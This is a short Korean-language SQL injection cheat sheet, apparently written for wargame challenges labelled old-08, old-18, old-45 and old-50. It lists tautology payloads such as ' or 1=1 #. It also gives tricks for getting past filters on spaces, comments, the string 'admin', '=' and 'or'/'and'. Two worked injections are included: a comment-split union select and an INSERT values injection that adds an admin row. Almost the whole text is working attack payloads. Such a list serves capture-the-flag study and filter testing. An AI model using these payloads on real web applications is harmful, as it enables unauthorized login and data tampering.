Cheat Sheet - SQL Injection

1. 기본

• ' or 1=1 #
• ' or '1'='1

2. 공백 필터링 (old-18)

• /**/ (주석) 
• () (괄호) 
• + (더하기) 
• %09 (\t)  
• %0a (\n)

3. 주석 (old-50)

• --
• #
• /**/

    예제) 공백 필터 및 md5 주석 처리

    select lv from chall50 where id='{$_GET['id']}' and pw=md5('{$_GET['pw']}')

    select lv from chall50 where id=''/*' and pw=md5('*/union/**/select/**/3#')

   

4. admin 문자열 필터링 (old-45)

• reverse("nimda")
• 0x61646d696e 
• char(97, 100, 109, 105, 110) 
• 0b0110000101100100011011010110100101101110

5. values 데이터 추가 삽입 (old-08)

    insert into chall8(agent,ip,id) values('{$agent}','{$ip}','guest')

    insert into chall8(agent,ip,id) values('A','1.1.1.1','admin'), ('B','{$ip}','guest')

 

6. '=' 필터링

• like
• in

7. 'or', 'and' 문자열 필터링

• ||
• &&
• %26%26 (&&)
• %7c%7c ( || )